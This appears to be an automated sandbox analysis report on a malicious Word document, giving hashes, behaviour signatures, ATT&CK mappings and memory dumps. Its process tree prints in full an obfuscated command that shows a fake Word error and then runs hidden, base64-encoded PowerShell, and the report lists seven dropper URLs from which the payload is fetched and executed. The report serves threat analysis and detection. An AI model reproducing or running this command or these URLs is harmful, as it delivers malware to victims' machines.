Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    22-01-2021 14:33

General

  • Target

    Details-2199-0018595796.doc

  • Size

    162KB

  • MD5

    818b1ab912b03f7224b2be26ec05ac64

  • SHA1

    bfe77955067bed43c5c95996aba948d3ed0d7703

  • SHA256

    caede708b38ca301f7c2d14f3dec3ccf02e0312f4f8a2b21b26d7bf6ea714206

  • SHA512

    84478c4a233508a6bb37a7fedefcb90ee6176c41988d226fd76c0ff995659c46be33fdbed383fa6bba00c1585e28e681362ce82dfb08da8cf787fe6db19399b8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://zhongshixingchuang.com/wp-admin/N2X3/

exe.dropper

http://members.nlbformula.com/cgi-bin/vazlwkU/

exe.dropper

http://dynamicsteels.com/can-you-lpy7p/MaJIcT/

exe.dropper

https://www.lixko.com/wp-includes/LEq9VJd/

exe.dropper

https://srishtiherbs.com/jms/bq8/

exe.dropper

https://surfboarddigital.com/carol-stream-i7lsj/8e/

exe.dropper

https://unikaryapools.com/wp/ysFiRq1/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Details-2199-0018595796.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1320
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD cwBFAHQALQBpAFQARQBtACAAIAB2AEEAcgBpAEEAQgBMAGUAOgB0AFEANAB1AE8AbAAgACAAKAAgAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADEAfQB7ADIAfQAiAC0ARgAgACcAUwB5ACcALAAnAGQASQBSAGUAQwB0AE8AUgAnACwAJwB5ACcALAAnAFMAdABFAE0ALgBpAE8ALgAnACkAIAApADsAIAAkADAAOABQAHUAPQAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADQAfQB7ADEAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBmACcARQBQAE8AaQBuACcALAAnAC4AJwAsACcAVABtAEEATgBhACcALAAnAEcARQBSACcALAAnAFkAcwBUAEUAbQAuAG4AZQB0ACcALAAnAFMAZQBSAHYAaQBDACcALAAnAHMAJwApACAAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwB0AGwAeQBDAG8AbgAnACkAKwAnAHQAJwArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABEAHQAawBoAHUAcAA3AD0AJABRADIAOQBKACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABVADMANgBUADsAJABWAF8AOQBDAD0AKAAnAFMANwAnACsAJwAzAE0AJwApADsAIAAkAFQAUQA0AHUATwBMADoAOgAiAGMAcgBFAEEAYABUAGUAZABgAEkAUgBgAEUAQwB0AG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBpAE8ASgAnACsAJwBFACcAKQArACcAOAAxACcAKwAoACcANQAnACsAJwB6AGsAdQBpAE8AJwArACcASgAnACkAKwAnAFcAJwArACgAJwB5ACcAKwAnAGQAZgAnACsAJwByAGsAdwBpAE8AJwApACsAJwBKACcAKQAuACIAcgBlAGAAcABMAEEAYABDAEUAIgAoACgAJwBpAE8AJwArACcASgAnACkALABbAHMAVAByAGkATgBHAF0AWwBDAEgAYQByAF0AOQAyACkAKQApADsAJABNADcAXwBTAD0AKAAoACcARgA0ACcAKwAnADMAJwApACsAJwBCACcAKQA7ACAAIAAkADAAOABwAHUAOgA6ACIAUwBgAGUAYwB1AHIAaQB0AHkAUABgAFIATwB0AGAATwBjAE8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAUgAwAF8AUAA9ACgAKAAnAEsANwAnACsAJwA2ACcAKQArACcAVAAnACkAOwAkAEEAMAB5AGkANgBnAG4AIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBYACcAKQA7ACQATwA4ADkASwA9ACgAJwBQADMAJwArACcAOQBNACcAKQA7ACQARABxADcAeABiAGgAbwA9ACQASABPAE0ARQArACgAKAAnAHoAaQAnACsAKAAnAEwARQAnACsAJwA4ACcAKQArACgAJwAxADUAJwArACcAegAnACkAKwAnAGsAdQAnACsAKAAnAHoAaQAnACsAJwBMACcAKQArACcAVwAnACsAKAAnAHkAJwArACcAZABmACcAKQArACgAJwByAGsAJwArACcAdwB6ACcAKwAnAGkATAAnACkAKQAgAC0AQwByAEUAUABMAGEAYwBlACAAIAAoACcAegAnACsAJwBpAEwAJwApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEEAMAB5AGkANgBnAG4AKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEIAMwAxAFkAPQAoACcATAAxACcAKwAnADYATwAnACkAOwAkAFgAYgA1ADUAbQBzAGEAPQAoACcAXQAnACsAKAAnAGIAJwArACcAMgBbAHMAOgAvACcAKQArACgAJwAvAHoAaAAnACsAJwBvACcAKQArACcAbgAnACsAJwBnAHMAJwArACgAJwBoAGkAeABpACcAKwAnAG4AJwApACsAJwBnACcAKwAoACcAYwBoAHUAYQBuAGcAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvAHcAJwApACsAJwBwACcAKwAoACcALQBhACcAKwAnAGQAbQAnACkAKwAnAGkAbgAnACsAJwAvAE4AJwArACgAJwAyAFgAJwArACcAMwAnACkAKwAoACcALwBAAF0AYgAyAFsAJwArACcAcwA6AC8AJwArACcALwAnACkAKwAnAG0AJwArACgAJwBlAG0AJwArACcAYgAnACkAKwAnAGUAJwArACgAJwByAHMAJwArACcALgBuAGwAYgBmACcAKQArACcAbwAnACsAKAAnAHIAbQB1AGwAYQAuACcAKwAnAGMAbwBtACcAKwAnAC8AJwArACcAYwBnACcAKQArACgAJwBpAC0AYgBpAG4ALwAnACsAJwB2ACcAKQArACgAJwBhAHoAbAB3AGsAJwArACcAVQAnACkAKwAnAC8AJwArACcAQAAnACsAJwBdAGIAJwArACgAJwAyACcAKwAnAFsAcwA6AC8AJwArACcALwBkACcAKQArACgAJwB5ACcAKwAnAG4AYQBtAGkAYwAnACsAJwBzACcAKQArACgAJwB0AGUAZQAnACsAJwBsAHMALgAnACkAKwAoACcAYwBvACcAKwAnAG0AJwApACsAKAAnAC8AYwBhAG4AJwArACcALQB5AG8AJwApACsAJwB1ACcAKwAnAC0AJwArACgAJwBsAHAAeQA3ACcAKwAnAHAALwBNACcAKwAnAGEASgBJACcAKQArACgAJwBjAFQAJwArACcALwAnACkAKwAnAEAAXQAnACsAKAAnAGIAMgBbAHMAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwB3AHcALgBsACcAKQArACcAaQB4ACcAKwAoACcAawBvACcAKwAnAC4AYwAnACsAJwBvAG0ALwAnACkAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAbAB1ACcAKQArACgAJwBkAGUAcwAvAEwAJwArACcARQAnACsAJwBxADkAVgAnACkAKwAoACcASgBkAC8AQAAnACsAJwBdACcAKwAnAGIAMgBbACcAKQArACgAJwBzACcAKwAnAHMAOgAvAC8AJwApACsAKAAnAHMAcgBpAHMAaAB0ACcAKwAnAGkAaAAnACsAJwBlACcAKQArACgAJwByACcAKwAnAGIAcwAuAGMAJwApACsAJwBvACcAKwAnAG0AJwArACcALwBqACcAKwAnAG0AcwAnACsAKAAnAC8AYgBxACcAKwAnADgALwAnACkAKwAnAEAAXQAnACsAJwBiADIAJwArACgAJwBbAHMAJwArACcAcwA6ACcAKQArACgAJwAvACcAKwAnAC8AcwB1AHIAJwApACsAKAAnAGYAYgAnACsAJwBvACcAKQArACcAYQByACcAKwAnAGQAZAAnACsAKAAnAGkAJwArACcAZwBpACcAKQArACgAJwB0AGEAbAAuAGMAbwBtACcAKwAnAC8AJwApACsAJwBjACcAKwAnAGEAcgAnACsAJwBvACcAKwAnAGwALQAnACsAKAAnAHMAdAByACcAKwAnAGUAJwApACsAKAAnAGEAJwArACcAbQAtACcAKQArACcAaQAnACsAKAAnADcAbABzACcAKwAnAGoALwA4AGUALwBAACcAKQArACcAXQAnACsAJwBiADIAJwArACgAJwBbAHMAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AdQAnACsAJwBuACcAKQArACcAaQAnACsAKAAnAGsAJwArACcAYQByAHkAJwApACsAJwBhAHAAJwArACgAJwBvAG8AbABzAC4AJwArACcAYwAnACsAJwBvAG0AJwApACsAJwAvAHcAJwArACcAcAAnACsAJwAvAHkAJwArACcAcwAnACsAKAAnAEYAJwArACcAaQBSAHEAMQAnACkAKwAnAC8AJwApAC4AIgBSAGAAZQBwAEwAQQBDAGUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABQAEwAaQBUACIAKAAkAFoAMQAyAE4AIAArACAAJABEAHQAawBoAHUAcAA3ACAAKwAgACQAQgAxADYAQwApADsAJABIADYAMQBHAD0AKAAoACcATQAnACsAJwA3ADkAJwApACsAJwBSACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUwBkADAAMAB0AGIAawAgAGkAbgAgACQAWABiADUANQBtAHMAYQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwAnACsAJwBiAGoAZQBjAHQAJwApACAAUwBZAFMAVABFAE0ALgBOAEUAVAAuAHcAZQBiAGMATABpAEUATgB0ACkALgAiAEQATwBgAFcAbgBsAGAAbwBBAEQARgBgAGkATABlACIAKAAkAFMAZAAwADAAdABiAGsALAAgACQARABxADcAeABiAGgAbwApADsAJABNADEANgBMAD0AKAAoACcARQA3ACcAKwAnADYAJwApACsAJwBEACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEAHEANwB4AGIAaABvACkALgAiAGwAZQBgAE4AZwBUAGgAIgAgAC0AZwBlACAANAA4ADYAOQAwACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbABsADMAJwArACcAMgAnACkAIAAkAEQAcQA3AHgAYgBoAG8ALAAoACcAQwAnACsAKAAnAG8AbgAnACsAJwB0AHIAbwAnACkAKwAoACcAbABfAFIAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgBUAE8AYABTAFQAUgBgAGkAbgBHACIAKAApADsAJABTADYAOQBNAD0AKAAnAE4ANAAnACsAJwA2AEoAJwApADsAYgByAGUAYQBrADsAJABTADkAMQBXAD0AKAAoACcARQA5ACcAKwAnADIAJwApACsAJwBEACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA5AF8AUQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwAxAFMAJwApACkA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2776
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:3668
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD cwBFAHQALQBpAFQARQBtACAAIAB2AEEAcgBpAEEAQgBMAGUAOgB0AFEANAB1AE8AbAAgACAAKAAgAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADEAfQB7ADIAfQAiAC0ARgAgACcAUwB5ACcALAAnAGQASQBSAGUAQwB0AE8AUgAnACwAJwB5ACcALAAnAFMAdABFAE0ALgBpAE8ALgAnACkAIAApADsAIAAkADAAOABQAHUAPQAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADQAfQB7ADEAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBmACcARQBQAE8AaQBuACcALAAnAC4AJwAsACcAVABtAEEATgBhACcALAAnAEcARQBSACcALAAnAFkAcwBUAEUAbQAuAG4AZQB0ACcALAAnAFMAZQBSAHYAaQBDACcALAAnAHMAJwApACAAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwB0AGwAeQBDAG8AbgAnACkAKwAnAHQAJwArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABEAHQAawBoAHUAcAA3AD0AJABRADIAOQBKACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABVADMANgBUADsAJABWAF8AOQBDAD0AKAAnAFMANwAnACsAJwAzAE0AJwApADsAIAAkAFQAUQA0AHUATwBMADoAOgAiAGMAcgBFAEEAYABUAGUAZABgAEkAUgBgAEUAQwB0AG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBpAE8ASgAnACsAJwBFACcAKQArACcAOAAxACcAKwAoACcANQAnACsAJwB6AGsAdQBpAE8AJwArACcASgAnACkAKwAnAFcAJwArACgAJwB5ACcAKwAnAGQAZgAnACsAJwByAGsAdwBpAE8AJwApACsAJwBKACcAKQAuACIAcgBlAGAAcABMAEEAYABDAEUAIgAoACgAJwBpAE8AJwArACcASgAnACkALABbAHMAVAByAGkATgBHAF0AWwBDAEgAYQByAF0AOQAyACkAKQApADsAJABNADcAXwBTAD0AKAAoACcARgA0ACcAKwAnADMAJwApACsAJwBCACcAKQA7ACAAIAAkADAAOABwAHUAOgA6ACIAUwBgAGUAYwB1AHIAaQB0AHkAUABgAFIATwB0AGAATwBjAE8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAUgAwAF8AUAA9ACgAKAAnAEsANwAnACsAJwA2ACcAKQArACcAVAAnACkAOwAkAEEAMAB5AGkANgBnAG4AIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBYACcAKQA7ACQATwA4ADkASwA9ACgAJwBQADMAJwArACcAOQBNACcAKQA7ACQARABxADcAeABiAGgAbwA9ACQASABPAE0ARQArACgAKAAnAHoAaQAnACsAKAAnAEwARQAnACsAJwA4ACcAKQArACgAJwAxADUAJwArACcAegAnACkAKwAnAGsAdQAnACsAKAAnAHoAaQAnACsAJwBMACcAKQArACcAVwAnACsAKAAnAHkAJwArACcAZABmACcAKQArACgAJwByAGsAJwArACcAdwB6ACcAKwAnAGkATAAnACkAKQAgAC0AQwByAEUAUABMAGEAYwBlACAAIAAoACcAegAnACsAJwBpAEwAJwApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEEAMAB5AGkANgBnAG4AKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAEIAMwAxAFkAPQAoACcATAAxACcAKwAnADYATwAnACkAOwAkAFgAYgA1ADUAbQBzAGEAPQAoACcAXQAnACsAKAAnAGIAJwArACcAMgBbAHMAOgAvACcAKQArACgAJwAvAHoAaAAnACsAJwBvACcAKQArACcAbgAnACsAJwBnAHMAJwArACgAJwBoAGkAeABpACcAKwAnAG4AJwApACsAJwBnACcAKwAoACcAYwBoAHUAYQBuAGcAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvAHcAJwApACsAJwBwACcAKwAoACcALQBhACcAKwAnAGQAbQAnACkAKwAnAGkAbgAnACsAJwAvAE4AJwArACgAJwAyAFgAJwArACcAMwAnACkAKwAoACcALwBAAF0AYgAyAFsAJwArACcAcwA6AC8AJwArACcALwAnACkAKwAnAG0AJwArACgAJwBlAG0AJwArACcAYgAnACkAKwAnAGUAJwArACgAJwByAHMAJwArACcALgBuAGwAYgBmACcAKQArACcAbwAnACsAKAAnAHIAbQB1AGwAYQAuACcAKwAnAGMAbwBtACcAKwAnAC8AJwArACcAYwBnACcAKQArACgAJwBpAC0AYgBpAG4ALwAnACsAJwB2ACcAKQArACgAJwBhAHoAbAB3AGsAJwArACcAVQAnACkAKwAnAC8AJwArACcAQAAnACsAJwBdAGIAJwArACgAJwAyACcAKwAnAFsAcwA6AC8AJwArACcALwBkACcAKQArACgAJwB5ACcAKwAnAG4AYQBtAGkAYwAnACsAJwBzACcAKQArACgAJwB0AGUAZQAnACsAJwBsAHMALgAnACkAKwAoACcAYwBvACcAKwAnAG0AJwApACsAKAAnAC8AYwBhAG4AJwArACcALQB5AG8AJwApACsAJwB1ACcAKwAnAC0AJwArACgAJwBsAHAAeQA3ACcAKwAnAHAALwBNACcAKwAnAGEASgBJACcAKQArACgAJwBjAFQAJwArACcALwAnACkAKwAnAEAAXQAnACsAKAAnAGIAMgBbAHMAcwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwB3AHcALgBsACcAKQArACcAaQB4ACcAKwAoACcAawBvACcAKwAnAC4AYwAnACsAJwBvAG0ALwAnACkAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAbAB1ACcAKQArACgAJwBkAGUAcwAvAEwAJwArACcARQAnACsAJwBxADkAVgAnACkAKwAoACcASgBkAC8AQAAnACsAJwBdACcAKwAnAGIAMgBbACcAKQArACgAJwBzACcAKwAnAHMAOgAvAC8AJwApACsAKAAnAHMAcgBpAHMAaAB0ACcAKwAnAGkAaAAnACsAJwBlACcAKQArACgAJwByACcAKwAnAGIAcwAuAGMAJwApACsAJwBvACcAKwAnAG0AJwArACcALwBqACcAKwAnAG0AcwAnACsAKAAnAC8AYgBxACcAKwAnADgALwAnACkAKwAnAEAAXQAnACsAJwBiADIAJwArACgAJwBbAHMAJwArACcAcwA6ACcAKQArACgAJwAvACcAKwAnAC8AcwB1AHIAJwApACsAKAAnAGYAYgAnACsAJwBvACcAKQArACcAYQByACcAKwAnAGQAZAAnACsAKAAnAGkAJwArACcAZwBpACcAKQArACgAJwB0AGEAbAAuAGMAbwBtACcAKwAnAC8AJwApACsAJwBjACcAKwAnAGEAcgAnACsAJwBvACcAKwAnAGwALQAnACsAKAAnAHMAdAByACcAKwAnAGUAJwApACsAKAAnAGEAJwArACcAbQAtACcAKQArACcAaQAnACsAKAAnADcAbABzACcAKwAnAGoALwA4AGUALwBAACcAKQArACcAXQAnACsAJwBiADIAJwArACgAJwBbAHMAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AdQAnACsAJwBuACcAKQArACcAaQAnACsAKAAnAGsAJwArACcAYQByAHkAJwApACsAJwBhAHAAJwArACgAJwBvAG8AbABzAC4AJwArACcAYwAnACsAJwBvAG0AJwApACsAJwAvAHcAJwArACcAcAAnACsAJwAvAHkAJwArACcAcwAnACsAKAAnAEYAJwArACcAaQBSAHEAMQAnACkAKwAnAC8AJwApAC4AIgBSAGAAZQBwAEwAQQBDAGUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABQAEwAaQBUACIAKAAkAFoAMQAyAE4AIAArACAAJABEAHQAawBoAHUAcAA3ACAAKwAgACQAQgAxADYAQwApADsAJABIADYAMQBHAD0AKAAoACcATQAnACsAJwA3ADkAJwApACsAJwBSACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUwBkADAAMAB0AGIAawAgAGkAbgAgACQAWABiADUANQBtAHMAYQApAHsAdAByAHkAewAoACYAKAAnAE4AJwArACcAZQB3AC0ATwAnACsAJwBiAGoAZQBjAHQAJwApACAAUwBZAFMAVABFAE0ALgBOAEUAVAAuAHcAZQBiAGMATABpAEUATgB0ACkALgAiAEQATwBgAFcAbgBsAGAAbwBBAEQARgBgAGkATABlACIAKAAkAFMAZAAwADAAdABiAGsALAAgACQARABxADcAeABiAGgAbwApADsAJABNADEANgBMAD0AKAAoACcARQA3ACcAKwAnADYAJwApACsAJwBEACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEAHEANwB4AGIAaABvACkALgAiAGwAZQBgAE4AZwBUAGgAIgAgAC0AZwBlACAANAA4ADYAOQAwACkAIAB7AC4AKAAnAHIAdQBuAGQAJwArACcAbABsADMAJwArACcAMgAnACkAIAAkAEQAcQA3AHgAYgBoAG8ALAAoACcAQwAnACsAKAAnAG8AbgAnACsAJwB0AHIAbwAnACkAKwAoACcAbABfAFIAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgBUAE8AYABTAFQAUgBgAGkAbgBHACIAKAApADsAJABTADYAOQBNAD0AKAAnAE4ANAAnACsAJwA2AEoAJwApADsAYgByAGUAYQBrADsAJABTADkAMQBXAD0AKAAoACcARQA5ACcAKwAnADIAJwApACsAJwBEACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA5AF8AUQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwAxAFMAJwApACkA
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:796

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    System Information Discovery

    3
    T1082

    Query Registry

    2
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/796-11-0x0000023FD1960000-0x0000023FD1962000-memory.dmp
      Filesize

      8KB

    • memory/796-8-0x0000000000000000-mapping.dmp
    • memory/796-9-0x00007FF8CDE30000-0x00007FF8CE81C000-memory.dmp
      Filesize

      9.9MB

    • memory/796-10-0x0000023FD18E0000-0x0000023FD18E1000-memory.dmp
      Filesize

      4KB

    • memory/796-12-0x0000023FD1963000-0x0000023FD1965000-memory.dmp
      Filesize

      8KB

    • memory/796-13-0x0000023FD1AF0000-0x0000023FD1AF1000-memory.dmp
      Filesize

      4KB

    • memory/796-14-0x0000023FD1966000-0x0000023FD1968000-memory.dmp
      Filesize

      8KB

    • memory/1320-3-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp
      Filesize

      64KB

    • memory/1320-4-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp
      Filesize

      64KB

    • memory/1320-5-0x0000020E55AB0000-0x0000020E560E7000-memory.dmp
      Filesize

      6.2MB

    • memory/1320-6-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp
      Filesize

      64KB

    • memory/1320-2-0x00007FF8B5E60000-0x00007FF8B5E70000-memory.dmp
      Filesize

      64KB

    • memory/3668-7-0x0000000000000000-mapping.dmp